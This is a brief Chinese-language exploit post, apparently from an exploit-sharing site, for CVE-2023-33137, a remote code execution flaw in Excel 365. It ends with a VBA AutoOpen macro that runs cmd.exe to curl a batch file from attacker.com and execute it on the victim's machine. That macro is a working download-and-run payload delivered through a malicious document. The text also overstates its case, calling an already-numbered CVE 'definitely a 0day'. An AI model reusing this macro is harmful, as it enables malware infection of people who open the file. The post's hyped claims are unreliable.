描述：

CVE-2023-33137-Microsoft Excel Microsoft® 365 MSO（版本 2305 内部版本 16.0.16501.20074）32 位远程代码执行漏洞，该漏洞利用程序与第三方漏洞利用服务器连接，该服务器等待受害者调用他并使用管道发布方法执行他发送的内容！这绝对是一个0day漏洞！这对于被他感染的受害者来说绝对是危险的！当受害者点击 Excel 文件中的按钮时，它会向漏洞利用服务器发出 POST 请求，服务器会以这种方式进行响应：他创建另一个隐藏的恶意文件并直接在受害者的计算机上执行它，然后一切就都完成了。消失了，太恶心了

状态：高漏洞警告：这对于普通用户来说非常危险！

[+]利用：

Sub AutoOpen()  Call Shell("cmd.exe /S /c" & "curl -s https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat > maloumnici.bat && .\maloumnici.bat", vbNormalFocus)End Sub